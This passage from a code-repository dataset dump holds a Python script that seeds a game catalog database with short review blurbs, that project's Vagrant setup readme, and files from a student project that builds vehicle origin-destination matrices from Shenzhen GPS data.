she has the\n power to rewind time, right on the edge of a disaster about\n to hit her town. Yet the drama really\n comes from her relationships,\n from the genuinely difficult choices to make, and the clunkily\n written but still efficient coming of\n age story at its hear\"\"\", category=category3)\n\nsession.add(item1)\nsession.commit()\n\nitem2 = Item(user_id=1, name=\"Soma\", description=\"\"\" Any time you create\n something as notable Amnesia:\n The Dark Descent, theres going to be the lingering question\n OK, so what else have you got?\n Frictional responded with Soma\n , building on its horror heritage, but putting the scares\n into an endlessly more complex, beautiful, and somehow even\n more claustrophobic environment.\n Unlike a lot of recent horror\n , it avoids an over reliance on\n jump scares and repeated gimmicks\n where possible, and soon reveals\n it has more to it than just scares\n . Its a solid bit of SF thatll still\n make you want to hide behind\n the sofa. As long your sofa is in the same room as your PC\n , which it probably isnt\"\"\", category=category3)\n\nsession.add(item2)\nsession.commit()\n\nitem3 = Item(user_id=1, name=\"Her Story\", description=\"\"\"Her Story has now won\n enough awards for creator Sam Barlow\n to melt them all down and create some\n kind of towering super award, and not\n without reason. Her Story isnt the only\n good FMV game ever made, despite what\n some will say, but it is a genuinely\n brilliant attempt to use the format for\n the kind of interactions it was created\n to offer, instead of bending over backwards\n to make it do things it never should have been\n asked to in the first place. Its a bit of a shame\n that what begins as a murder mystery soon takes\n a swerve into a more fantastical character study\n , and that your purpose in the game isnt quite what\n it seems. Even so, digging through the tale by searching\n for keywords and clips and piecing together the order for\n yourself is as compelling as any\n detective fiction\"\"\", category=category3)\n\nsession.add(item3)\nsession.commit()\n\nitem4 = Item(user_id=1, name=\"Little Big Adventure 2 \", description=\"\"\"Twinsen is the awkwardly named\n hero of planet Twinsun, formerly under the despotic\n control of one Doctor FunFrock. Why, yes, it is a\n French game. How did you guess? This sequel widens\n the scope as friendly aliens arrive to, and lets\n be clear, definitely not abduct the worlds wizards\n for evil purposes, and the ensuing trip through space\n is among the most adorable, most tactile adventures\n youll ever go on. Also, the most badass threat\n ever delivered by a hero.\"\"\", category=category3)\n\nsession.add(item4)\nsession.commit()\n\n\n# Category of RTS\ncategory5 = Category(user_id=1, name=\"RTS \")\n\nsession.add(category5)\nsession.commit()\n\n\nitem1 = Item(user_id=1, name=\"Driftland\", description=\"\"\"The Magic Revival\n : Its nice to see a new face finally make it onto\n this list Driftland was in Early Access for\n a couple of years before it finally released\n in April 2019, and it seems that time has been\n put to good use. This is an innovative RTS that\n follows in the mould of the classic Majesty\n franchise where indirect control is the order\n of the day. You are a Mage whose realm is on one\n of many shattered pieces of the world floating\n around, and you must develop your holdings and\n expand onto other ones by connecting\n them together.\"\"\", category=category5)\n\nsession.add(item1)\nsession.commit()\n\nitem2 = Item(user_id=1, name=\"Bad North\", description=\"\"\"Jotunn Edition\n Self styling itself as a micro strategy\n game, Bad North is the poster child for minimalist\n design facilitating tight tactical decision making.\n Evoking the best bits of games like FTL, this game\n sees you taking your modest force from island to island,\n protecting them against waves of blood thirsty marauders.\n As you progress through the game you can earn coins\n to level up your troops, recruit new troops and\n find powerful items to\n aid you.\"\"\", category=category5)\n\nsession.add(item2)\nsession.commit()\n\nitem3 = Item(user_id=1, name=\"Shadow Tactics\", description=\"\"\"Blades of the Shogun This isnt\n a new release but we feel its definitely\n worth mentioning as Shadow Tactics is a\n wonderfully tense real time tactical/puzzle\n game that will challenge not only your creative\n thinking, but also your combo and control skills.\n This is a stealth based game that follows in the hallowed\n tradition of classics like Commandos, but also taking\n queues from modern contemporaries like Assassins Creed.\n With a very powerful and engaging narrative, you\n must guide up to five characters through vibrant\n and varied levels. Subterfuge is key, and fighting\n your way out isnt really an option.\"\"\", category=category5)\n\nsession.add(item3)\nsession.commit()\n\n\n# Category of Action\ncategory6 = Category(user_id=1, name=\"Action \")\n\nsession.add(category6)\nsession.commit()\n\n\nitem1 = Item(user_id=1, name=\"The Elder Scrolls V: Skyrim Special Edition\", description=\"\"\"The\n Elder Scrolls V: Skyrim is the fifth game in\n Bethesdas ever popular series of role playing games.\n Like its predecessors, Skyrim takes place in an open\n environment which is full of exploration, wonder and\n a whole slew of quests. You can easily spend countless\n hours within this fantasy world and wed honestly be\n surprised to find a gamer who has yet to experience\n this journey. If you have yet to do so, pick up The\n Elder Scrolls V: Skyrim and begin to weave your own\n tale with the main campaign along with the previously\n released DLC.\"\"\", category=category6)\n\nsession.add(item1)\nsession.commit()\n\nitem2 = Item(user_id=1, name=\"Monster Hunter: World\", description=\"\"\"The Monster Hunter\n franchise is consistently growing and\n with each new installment a number of new gamers\n explore the monster filled worlds development studio\n Capcom has crafted. Monster Hunter: World is fifth main\n installment to the franchise and as you can expect, there\n will be a number of notable updates.\"\"\", category=category6)\n\nsession.add(item2)\nsession.commit()\n\nitem3 = Item(user_id=1, name=\"The Witcher 3: Wild Hunt\", description=\"\"\"Fans of\n western RPGs will no doubt have played at least one\n of the Witcher games. This series of Polish games\n based on the works of Andrzej Sapkowski has gained\n a lot of fans over the years, mainly thanks to its\n complex world and stories, incredible graphics and\n deep gameplay systems.The third and final installment\n in the series sees a much older Geralt of Rivia\n one of the titular Witchers\n as he deals with the invasion of the Northern\n Kingdom by the Nilfgaard Empire and the otherworldly\n threat of the Wild Hunt. Offering a massive open world,\n hours upon hours of story content and sidequests, tons\n of NPCS to interact with and monsters to hunt, this title\n will keep you busy for quite some time.\"\"\", category=category6)\n\nsession.add(item3)\nsession.commit()\n\nitem4 = Item(user_id=1, name=\"Uncharted 4 \", description=\"\"\"The Uncharted\n franchise has been immensely popular with\n Sony gamers with the fourth main installment,\n Uncharted 4: A Thiefs End was set to be the conclusion\n to the Uncharted series starring Nathan Drake. A Thiefs\n End takes place several years after the events of\n Uncharted 3: Drakes Deception, where Nathan Drake\n has been retired from fortune hunting. That is until he\n is reunited with his older brother Sam and partner Sully\n where the trio must search for clues to the location of\n Captain Henry Averys long lost treasure in order to\n save Sams life.\"\"\", category=category6)\n\nsession.add(item4)\nsession.commit()\n\n# Category of Stealth Shooter\ncategory4 = Category(user_id=1, name=\"Stealth Shooter\")\n\nsession.add(category4)\nsession.commit()\n\n\nitem1 = Item(user_id=1, name=\"DISHONORED\", description=\"\"\"Some of the\n best stealth games can feel turn based\n even those that are not Invisible, Inc.\n They are the ones that have you marking targets,\n mapping patrol routes, and mentally solving problems\n all before uncloaking and triggering the action when\n youre ready. The Dishonored series is the epitome\n of that style and, as an added bonus, is just as good\n for combo slinging predatory combat when youre spotted.\n No wonder Arkane picked up a Dishonored staff game\n of the year award from us.\"\"\", category=category4)\n\nsession.add(item1)\nsession.commit()\n\nitem2 = Item(user_id=1, name=\"HITMAN\", description=\"\"\"BLOOD MONEY The bald barcoded one\n known as Agent 47 has had a consistently solid\n career in stealth games taking us on globetrotting,\n sprawling missions of slick, clinical killings since 2000\n all the way up to his excellent latest outing\n which you can find out more about in our Hitman 2\n review. He hit his stride with Blood Money, with fantastic\n level design that was believable while offering some of\n the most entertaining, diverse ways to\n carry out hits. \"\"\", category=category4)\n\nsession.add(item2)\nsession.commit()\n\nitem3 = Item(user_id=1, name=\"SPLINTER CELL: CHAOS THEORY\", description=\"\"\"Chaos Theory\n is ripe with innovative stealth game mechanics that\n still feel good today. You can extract information\n from enemies by holding knives to their throats\n (and relishing the startled looks on their faces),\n pull them over edges, hang upside down from rafters\n to break necks, and phht phht them with a silenced\n pistol. With his night vision goggles, Sam Fisher is a\n master of the games nocturnal, shadowy environments, and\n it is great fun shooting out lights and tormenting your\n disoriented enemies like a less\n ostentatious Batman.\"\"\", category=category4)\n\nsession.add(item3)\nsession.commit()\n\n\nprint \"added Game items!\"\n"
},
{
"alpha_fraction": 0.7014435529708862,
"alphanum_fraction": 0.709645688533783,
"avg_line_length": 30.446807861328125,
"blob_id": "ca98f377295ea8c9052d040367234912c2694e8f",
"content_id": "b3e73ce9aa0bf1e42bf203df41179ab34f8baed5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3048,
"license_type": "no_license",
"max_line_length": 253,
"num_lines": 94,
"path": "/readme.md",
"repo_name": "AbdelrahmanKhalil96/Item_catalog_Error_fixed",
"src_encoding": "UTF-8",
"text": "Item Catalog\r\n\r\n\r\n#### 1-Use a terminal\r\nwe recommend using the Git Bash terminal that comes with the Git software. If you don't already have Git installed, download Git from \r\ngit-scm.com.\r\n\r\n### 2-install virtual box from this link\r\nInstall the platform package for your operating system. You do not need the extension pack or the SDK. You do not need to launch VirtualBox after installing it; Vagrant will do that.\r\n\r\nhttps://www.virtualbox.org/wiki/Download_Old_Builds_5_1\r\n\r\n### 3-Install Vagrant\r\nVagrant is the software that configures the VM and lets you share files between your host computer and the VM's filesystem. Download it from \r\nhttps://www.vagrantup.com/downloads.html\r\n\r\n. Install the version for your operating system.\r\n\r\n\r\n### 4-Download the VM configuration\r\nThere are a couple of different ways you can download the VM configuration.\r\n\r\nYou can download and unzip this file: \r\nhttps://s3.amazonaws.com/video.udacity-data.com/topher/2018/April/5acfbfa3_fsnd-virtual-machine/fsnd-virtual-machine.zip\r\nThis will give you a directory called FSND-Virtual-Machine. It may be located inside your Downloads folder.\r\n\r\nNote: If you are using Windows OS you will find a Time Out error, to fix it use the new Vagrant file configuration:\r\nhttps://s3.amazonaws.com/video.udacity-data.com/topher/2019/March/5c7ebe7a_vagrant-configuration-windows/vagrant-configuration-windows.zip\r\n\r\nto replace you current Vagrant file.\r\nto start the program navigate to its folder using\r\ncd <path>\r\n \r\n Change to this directory in your terminal with cd. Inside, you will find another directory called vagrant. Change directory to the vagrant directory:\r\n \r\nStart the virtual machine\r\nFrom your terminal, inside the vagrant subdirectory, run the command vagrant up. This will cause Vagrant to download the Linux operating system and install it. This may take quite a while (many minutes) depending on how fast your Internet connection is.\r\n\r\nWhen vagrant up is finished running, you will get your shell prompt back. At this point, you can run vagrant ssh to log in to your newly installed Linux VM!\r\n\r\nNext You Should Install python, but don't worry... it's already installed in the vm\r\n\r\nfirst Launch Vagrant using Git\r\n```\r\n$ Vagrant up \r\n```\r\n---------------\r\nLogin to Vagrant\r\n```\r\n$ Vagrant ssh\r\n```\r\n---------------\r\nChange directory to /vagrant\r\n```\r\n$ Cd /vagrant\r\n```\r\n---------------\r\nInitialize the database\r\n```\r\n$ Python database_setup.py\r\n```\r\n---------------\r\n\r\nPopulate the database with some initial data\r\n```\r\n$ Python lotsofdata.py\r\n```\r\n---------------\r\nLaunch application\r\n```\r\n$ Python final.py\r\n```\r\n---------------\r\nOpen the browser and go to http://localhost:5000\r\n\r\nJSON endpoints:-\r\nReturns JSON of all Catagories With Their Items\r\n```\r\n/category/JSON\r\n```\r\n\r\nReturns JSON of Only Categories\r\n```\r\n/category/only/JSON\r\n```\r\nReturns JSON of All Items Of Specific Category\r\n```\r\n/category/<int:category_id>/item/JSON\r\n```\r\n ------------------------------------------------\r\n \r\n ### Refrences :\r\n stackoverflow.com\r\n udacity.com"
}
] | 2 |
ipat81/indepedent_study | https://github.com/ipat81/indepedent_study | 0ff770ac4948d9473c19c5b93cd3589bef608f3a | 33f50e6b139e3e344af0ea257512f4c7fca00407 | cc374af0579723f0a936fd69c70023b870c8474e | refs/heads/master | 2021-01-19T04:10:39.077122 | 2017-05-10T00:21:25 | 2017-05-10T00:21:25 | 87,354,390 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5141242742538452,
"alphanum_fraction": 0.5216572284698486,
"avg_line_length": 20.239999771118164,
"blob_id": "a7923911378b8c9f9421452519992067f55b63f6",
"content_id": "5b5545e45b1fd6707728c539be49f79ba580a241",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 531,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 25,
"path": "/matrices/cpp/makeMatrices.cpp",
"repo_name": "ipat81/indepedent_study",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include \"csv.h\"\n\nint main(int argc, char *argv[]){\n if(argc < 2){\n std::cout << \"Error: not enough arguments\";\n return 1;\n }\n char *filename = argv[1];\n\n io::CSVReader<4> in(filename);\n in.set_header(\"id\", \"time_of_day\", \"lon\", \"lat\");\n int id;\n int time_of_day;\n float lon;\n float lat;\n while(true){\n bool has_line = in.read_row(id, time_of_day, lon, lat);\n if(!has_line){\n break;\n }\n\n //std::cout << id << ' ' << time_of_day << ' ' << lon << ' ' << lat << ' ' << '\\n';\n }\n}\n"
},
{
"alpha_fraction": 0.559425950050354,
"alphanum_fraction": 0.5742987394332886,
"avg_line_length": 31.756410598754883,
"blob_id": "9541b0749b5e757cd91f5dea82ec85552a083af6",
"content_id": "8a79ec6cd42571c1002decabe283586bb5cb5210",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7665,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 234,
"path": "/matrices/python/makeMatrices.py",
"repo_name": "ipat81/indepedent_study",
"src_encoding": "UTF-8",
"text": "\"\"\"\n- all times are in seconds\n\"\"\"\nimport csv, json, math, time, sys\nfrom collections import deque\nfrom itertools import repeat\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nfrom matplotlib import path\n\nimport pandas as pd\n\nMIN_STOP_TIME = 180\nMATRIX_TIME_INTERVAL = 300\nREGIONS_FILE = 'data/shenzhen_tran_mapbox_polygon.json'\nPATHS_FILE = 'data/bus_raw_p.txt'\n\ndef make_polygon_list():\n polygon_list = []\n with open(REGIONS_FILE) as data_file:\n data = json.load(data_file)\n for x in range(0, len(data['features'])):\n p = path.Path(data['features'][x]['geometry']['coordinates'][0])\n polygon_list.append(p)\n\n return polygon_list\n\n\ndef make_pnpoly_polygon_list():\n polygon_list = []\n with open(REGIONS_FILE) as data_file:\n data = json.load(data_file)\n for x in range(0, len(data['features'])):\n p = data['features'][x]['geometry']['coordinates'][0]\n polygon_list.append(p)\n\n return polygon_list\n\n\ndef get_last_row(reader):\n try:\n lastrow = deque(reader)[-3]\n except IndexError: # empty file\n lastrow = None\n return lastrow\n\n\ndef which_polygon(lon, lat, polygon_list):\n x = 0\n for polygon in polygon_list:\n if polygon.contains_points([(lon, lat)]):\n return x\n x += 1\n return x\n\n\ndef which_polygon_pnpoly(lon, lat, polygon_list):\n x = 0\n p = (lon, lat)\n for polygon in polygon_list:\n if pnpoly.cnpnpoly(p, polygon):\n return x\n x += 1\n return x\n\n\ndef make_region_points(polygon_list):\n centroids = []\n for p in polygon_list:\n x = 0\n y = 0\n for coords in p:\n x += coords[0]\n y += coords[1]\n centroids.append([x/len(p), y/len(p)])\n return centroids\n\n\ndef distance(p0, p1):\n return math.sqrt((p0[0] - p1[0])**2 + (p0[1] - p1[1])**2)\n\n\ndef make_distance_list(lon, lat, region_points):\n distances = []\n for r in region_points:\n distances.append(distance((lon,lat), (r[0],r[1])))\n return distances\n\ndef make_matrices(vehicle_paths, num_regions):\n num_matrices = 86400 / MATRIX_TIME_INTERVAL\n mtime = time.time()\n matrices = [[[0] * num_regions for j in xrange(num_regions)] for i in xrange(num_matrices)]\n print 'time spent making matrix: ', time.time() - mtime\n\n for path in vehicle_paths:\n # ya never know\n if len(path) < 2:\n continue\n\n origin_region = path[0][4]\n origin_time = path[0][1]\n origin_coord = (path[0][2], path[0][3])\n last_location_coord = last_location_time = last_location_region = None\n last_location_duration = 0\n\n for i in xrange(1, len(path)):\n location = path[i]\n location_time = location[1]\n location_coord = (location[2], location[3])\n location_region = location[4]\n\n # we are still at the previous destination stop so skip\n if location_coord == origin_coord:\n continue\n \n # just set a new origin so theres no last location since leaving the origin\n if not last_location_coord:\n last_location_coord = location_coord\n last_location_time = location_time\n last_location_region = location_region\n # the vehicle stayed in the same place\n elif last_location_coord == location_coord:\n # update time spent at location\n last_location_duration += location_time - last_location_time\n last_location_time = location_time\n\n if last_location_duration >= MIN_STOP_TIME:\n # update matrix\n matrix_index = (origin_time % 86400) / 300\n matrices[matrix_index][origin_region][last_location_region] += 1\n\n # update origin to last location and reset last location\n origin_region = last_location_region\n origin_time = last_location_time\n origin_coord = location_coord\n last_location_coord = last_location_time = last_location_region = None\n last_location_duration = 0\n # the vehicle moved to another location\n else:\n last_location_coord = location_coord\n last_location_time = location_time\n last_location_region = location_region\n last_location_duration = 0\n \n # TODO: write to .mat file\n return matrices\n\ndef make_vehicle_array(filename, polygon_list, region_points, use_pandas=False):\n total_time = time.time()\n f = open(filename, 'rb')\n rows = None\n last_vehicle_id = -1\n\n if use_pandas:\n print 'USING PANDAS'\n rows = pd.read_csv(filename).itertuples()\n last_vehicle_id = int(get_last_row(rows)[1])\n rows = pd.read_csv(filename).itertuples()\n else:\n print 'USING STDLIB'\n rows = csv.reader(f)\n last_vehicle_id = int(get_last_row(rows)[0])\n f.seek(0)\n\n vehicle_paths = [[] for i in repeat(None, last_vehicle_id+1)]\n\n total_top10_time = 0\n total_whichpolygon_time = 0\n total_create_time = 0\n total_append_time = 0\n\n for row in rows:\n if len(row) < 4 or any(pd.isnull(val) for val in row): # each row should be id, time, long, lat\n continue\n\n offset = 1 if use_pandas else 0\n\n region = -1\n\n top10_time = time.time()\n # 10 closest regions\n distance_list = make_distance_list(float(row[2 + offset]), float(row[3 + offset]), region_points)\n smallest_indices = [-1] * 10\n for i in xrange(10):\n smallest = sys.float_info.max\n for j in xrange(len(distance_list)):\n distance = distance_list[j]\n if distance < smallest:\n smallest = distance\n smallest_indices[i] = j\n distance_list[smallest_indices[i]] = sys.float_info.max\n total_top10_time += time.time() - top10_time\n\n # check top 10\n for index in smallest_indices:\n if polygon_list[index].contains_points([(float(row[2 + offset]), float(row[3 + offset]))]):\n region = index\n break\n\n which_polygon_time = time.time()\n # check the rest\n if region == -1:\n region = which_polygon(float(row[2 + offset]), float(row[3 + offset]), polygon_list)\n total_whichpolygon_time += time.time() - which_polygon_time\n\n create_time = time.time()\n v = [int(row[0 + offset]), int(row[1 + offset]), float(row[2 + offset]), float(row[3 + offset]), region]\n total_create_time += time.time() - create_time\n\n append_time = time.time()\n vehicle_paths[v[0]].append(v)\n total_append_time += time.time() - append_time\n\n f.close()\n\n total_time = time.time() - total_time\n print 'TOTAL TOP10 TIME: ', total_top10_time, '\\n', \\\n 'TOTAL WHICHPOLYGON TIME: ', total_whichpolygon_time, '\\n', \\\n 'TOTAL CREATE TIME: ', total_create_time, '\\n', \\\n 'TOTAL APPEND TIME: ', total_append_time, '\\n', \\\n 'TOTAL TIME: ', total_time\n\n return vehicle_paths\n\n\nif __name__ == '__main__':\n plist_path = make_polygon_list()\n plist = make_pnpoly_polygon_list()\n region_points = make_region_points(plist)\n vehicle_paths = make_vehicle_array(PATHS_FILE, plist_path, region_points)\n # we add 1 to arg2 for the \"out of city\" region\n matrices = make_matrices(vehicle_paths, len(plist) + 1)\n"
},
{
"alpha_fraction": 0.7888198494911194,
"alphanum_fraction": 0.7919254899024963,
"avg_line_length": 127.5999984741211,
"blob_id": "4a5c43c0413306b20eeafa50efe8ded6c9dea8a0",
"content_id": "ea2ad50cfcb36bb1c52cd5ebb8ea475d0c8fc366",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 644,
"license_type": "no_license",
"max_line_length": 305,
"num_lines": 5,
"path": "/notes.txt",
"repo_name": "ipat81/indepedent_study",
"src_encoding": "UTF-8",
"text": "1. pnpoly alogorithms - http://erich.realtimerendering.com/ptinpoly/\n\nWe need to make a distribution of distance traveled to frequency. As well as time traveled to frequency. Basically, a line graph that shows how many cars traveled a given distance and the relationship between the two variables. Same for time. We also need to derive a function of the line from the graphs.\n\nThis code must be pretty modular because it needds to work for all regions or 1 particular region. It should also be able to take in data from any source (private, bus, truck, etc). We need to use starting region as the region in question when looking through data. \n"
},
{
"alpha_fraction": 0.7352941036224365,
"alphanum_fraction": 0.7591911554336548,
"avg_line_length": 67.125,
"blob_id": "ff35e4aebf61fb32a8c8e54f79acac6e753478bf",
"content_id": "688af186cfe1e2db961c9daec786b90764394712",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 544,
"license_type": "no_license",
"max_line_length": 313,
"num_lines": 8,
"path": "/map/readme.md",
"repo_name": "ipat81/indepedent_study",
"src_encoding": "UTF-8",
"text": "# Trip Animation\n\n## running the code:\n**NOTE: this runs in Processing 2.2.1**\n\n- go to [line 20](https://github.com/ipat81/indepedent_study/blob/master/map/map.pde#L20) and change the path variable to the folder where you are storing your data. This should be the [sample data folder](https://github.com/ipat81/indepedent_study/tree/master/sample_data) located at the root of this repository.\n- In Processing, go to Sketch -> add file and the [unfolding.zip](https://github.com/ipat81/indepedent_study/tree/master/map/libraries).\n- press play!"
},
{
"alpha_fraction": 0.6207017302513123,
"alphanum_fraction": 0.6501754522323608,
"avg_line_length": 28.6875,
"blob_id": "dfad75eb3e4eaa35bea18e729294c9187dda1a85",
"content_id": "95e476bc424d8244e4c462b8341b086724dba382",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 2850,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 96,
"path": "/matrices/java/MakeMatrices/src/Util.java",
"repo_name": "ipat81/indepedent_study",
"src_encoding": "UTF-8",
"text": "import java.io.BufferedReader;\nimport java.io.FileReader;\nimport java.io.IOException;\n\nimport org.json.simple.JSONArray;\n\npublic class Util {\n\tpublic static final int SECONDS_IN_A_DAY = 86400;\n\t\n\t// indices for accessing the location arrays in vehiclePaths (see makeVehicleArray())\n\tpublic static final int ID = 0;\n\tpublic static final int TIME = 1;\n\tpublic static final int LON = 2;\n\tpublic static final int LAT = 3;\n\tpublic static final int REGION = 4;\n\t\n\tpublic static boolean isSamePoint(double[] point1, double[] point2){\n\t\treturn (point1[0] == point2[0]) && (point1[1] == point2[1]);\n\t}\n\t\n\tpublic static double distance(double[] p1, double[] p2){\n\t\treturn Math.sqrt(Math.pow(p1[0] - p2[0], 2) + Math.pow(p1[1] - p2[1], 2));\n\t}\n\t\n\t/* \n\t * Uses haversine formula found here:\n\t * http://www.movable-type.co.uk/scripts/latlong.html\n\t */\n\tpublic static double distanceKm(double[] p1, double[] p2){\n\t\t// convert to radians\n\t\tdouble[] p1Rad = {Math.toRadians(p1[0]), Math.toRadians(p1[1])};\n\t\tdouble[] p2Rad = {Math.toRadians(p2[0]), Math.toRadians(p2[1])};\n\t\t\n\t\tdouble deltaLon = Math.abs(p1Rad[0] - p2Rad[0]);\n\t\tdouble deltaLat = Math.abs(p1Rad[1] - p2Rad[1]);\n\t\tdouble deltaLonHalf = deltaLon / 2.0;\n\t\tdouble deltaLatHalf = deltaLat / 2.0;\n\t\tdouble cosLat1 = Math.cos(p1Rad[1]);\n\t\tdouble cosLat2 = Math.cos(p2Rad[1]);\n\t\tdouble R = 6371.0;\n\t\t\n\t\tdouble a = Math.sin(deltaLatHalf) * Math.sin(deltaLatHalf)\n\t\t\t\t+ cosLat1 * cosLat2 * Math.sin(deltaLonHalf) * Math.sin(deltaLonHalf);\n\t\tdouble c = 2.0 * Math.atan2(Math.sqrt(a), Math.sqrt(1-a));\n\t\tdouble d = R * c;\n\t\t\n\t\treturn d;\n\t}\n\t\n\tpublic static double getLatestTime(String filename) throws IOException{\n\t\tBufferedReader f = new BufferedReader(new FileReader(filename));\n\t\tString line = \"\";\n\t\tdouble latestTime = -1;\n\t\twhile ((line = f.readLine()) != null) {\n\t\t\tif(line.split(\",\").length == 4){\n\t\t\t\tlatestTime = Math.max(latestTime, Double.parseDouble(line.split(\",\")[TIME]));\n\t\t\t}\n\t\t}\n\t\tf.close();\n\t\t\n\t\treturn latestTime;\n\t}\n\t\n\tpublic static int getLastVehicleId(String filename) throws IOException{\n\t\tBufferedReader f = new BufferedReader(new FileReader(filename));\n\t\tString lastLine = \"\";\n\t\tString line = \"\";\n\t\twhile ((line = f.readLine()) != null) {\n\t\t\tlastLine = (line.indexOf(',') == -1) ? lastLine : line;\n\t\t}\n\t\tint lastVehicleId = Integer.parseInt(lastLine.split(\",\")[ID]);\n\t\tf.close();\n\t\t\n\t\treturn lastVehicleId;\n\t}\n\t\n\tpublic static double[] toDoubleArray(JSONArray j){\n\t\tdouble[] d = new double[j.size()];\n\t\tfor(int i = 0; i < j.size(); i++){\n\t\t\td[i] = (double) j.get(i);\n\t\t}\n\t\t\n\t\treturn d;\n\t}\n\t\n\tpublic static double[] getXY(JSONArray points){\n\t\tdouble[] x = new double[points.size() * 2];\n\t\tfor(int i = 0, j = 0; i < points.size(); i++, j += 2){\n\t\t\tJSONArray point = (JSONArray) points.get(i);\n\t\t\tx[j] = (double) point.get(0);\n\t\t\tx[j + 1] = (double) point.get(1);\n\t\t}\n\t\t\n\t\treturn x;\n\t}\n}\n"
},
{
"alpha_fraction": 0.4644351601600647,
"alphanum_fraction": 0.6820083856582642,
"avg_line_length": 14.933333396911621,
"blob_id": "a8eaf878547e7867cd1a65a51d5e0f5bf8a9906b",
"content_id": "0df6ac5d08a64591694b06d470a9c1f8a925bfad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 239,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 15,
"path": "/matrices/python/requirements.txt",
"repo_name": "ipat81/indepedent_study",
"src_encoding": "UTF-8",
"text": "appdirs==1.4.3\nclick==6.7\nclick-plugins==1.0.3\ncligj==0.4.0\ncycler==0.10.0\ndescartes==1.1.0\nFiona==1.7.5\npackaging==16.8\npandas==0.19.2\npyparsing==2.2.0\npyproj==1.9.5.1\npython-dateutil==2.6.0\npytz==2017.2\nShapely==1.5.17.post1\nsix==1.10.0\n"
},
{
"alpha_fraction": 0.7467488050460815,
"alphanum_fraction": 0.7549623250961304,
"avg_line_length": 111.46154022216797,
"blob_id": "2a9b68665434da930c67e0dc930cb20ffd923358",
"content_id": "0aa89a23797dca97d935781959a392aee40570ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1461,
"license_type": "no_license",
"max_line_length": 410,
"num_lines": 13,
"path": "/matrices/java/MakeMatrices/readme.md",
"repo_name": "ipat81/indepedent_study",
"src_encoding": "UTF-8",
"text": "### MakeMatrices.java\n**NOTE: this runs in Eclipse**\n\n- Add the dependencies: right-click on the project and go to \"build path\" -> \"configure build path\". click \"Add external jars\" and add all the .jars in the [root of this project](https://github.com/ipat81/indepedent_study/tree/master/matrices/java/MakeMatrices)\n- Run sample: go to \"run\" -> \"run configurations\". click on the arguments tabs and enter `-pf X -rf Y` where X is the path to [this sample paths file](https://github.com/ipat81/indepedent_study/blob/master/sample_data/small_private_raw_p.txt) and Y is the path to [this sample regions file](https://github.com/ipat81/indepedent_study/blob/master/sample_data/shenzhen_tran_mapbox_polygon.json). then click run.\n\n<br>\n\n### Distributions.java\n**NOTE: this runs in Eclipse**\n\n- Add the dependencies: right-click on the project and go to \"build path\" -> \"configure build path\". click \"Add external jars\" and add all the .jars in the [root of this project](https://github.com/ipat81/indepedent_study/tree/master/matrices/java/MakeMatrices)\n- Run sample: go to \"run\" -> \"run configurations\". click on the arguments tabs and enter `-pf X -rf Y` where X is the path to [this sample paths file](https://github.com/ipat81/indepedent_study/blob/master/sample_data/small_private_raw_p.txt) and Y is the path to [this sample regions file](https://github.com/ipat81/indepedent_study/blob/master/sample_data/shenzhen_tran_mapbox_polygon.json). then click run."
},
{
"alpha_fraction": 0.7153846025466919,
"alphanum_fraction": 0.7230769395828247,
"avg_line_length": 17.571428298950195,
"blob_id": "09db6d1f47e77f72ff691737a6a75f4e74c873fd",
"content_id": "41ae48ed95cb0e2fa475bf6d0235ca63843eaa6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 130,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 7,
"path": "/matrices/cpp/Makefile",
"repo_name": "ipat81/indepedent_study",
"src_encoding": "UTF-8",
"text": "CC = g++\n\nmakeMatrices: makeMatrices.cpp\n\t$(CC) -std=c++0x makeMatrices.cpp -o makeMatrices -lpthread\n\nclean:\n\trm -f makeMatrices\n"
},
{
"alpha_fraction": 0.748062014579773,
"alphanum_fraction": 0.7558139562606812,
"avg_line_length": 29.41176414489746,
"blob_id": "9b26e355d7661a953e6e71bb803608d6e18300cf",
"content_id": "77c403bacaf3269940f2006d6db3ea02e85868c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 516,
"license_type": "no_license",
"max_line_length": 160,
"num_lines": 17,
"path": "/readme.md",
"repo_name": "ipat81/indepedent_study",
"src_encoding": "UTF-8",
"text": "# Independent Study - Spring 2017\n\n## map\n- Creates an animation of vehicles' paths\n\n## matrices\n- Creates OD matrices for a given interval of the day\n- Also, makes graphs to show the distribution of both the time and distance of all trips. Along with a regression polynomial to describe the trend of the data.\n\n## sample data\n- used to run other code.\n\n## slide & tutorial\n- contains slides from our presentations on processing and sumo.\n\n## report.pdf\n- a report of what we have worked on throughout the semester."
},
{
"alpha_fraction": 0.7771739363670349,
"alphanum_fraction": 0.79347825050354,
"avg_line_length": 368,
"blob_id": "0e4771008ee26ccc55781d973786323a1ad6282c",
"content_id": "bc90105e9cdd82703080bd87d5b9c6577b1aaeb2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 368,
"license_type": "no_license",
"max_line_length": 368,
"num_lines": 1,
"path": "/matrices/readme.md",
"repo_name": "ipat81/indepedent_study",
"src_encoding": "UTF-8",
"text": "**NOTE:** The [python](https://github.com/ipat81/indepedent_study/tree/master/matrices/python) and [ccp](https://github.com/ipat81/indepedent_study/tree/master/matrices/cpp) folders only contain things that we were experimenting with. The actual code can be found in the [java](https://github.com/ipat81/indepedent_study/tree/master/matrices/java/MakeMatrices) folder."
},
{
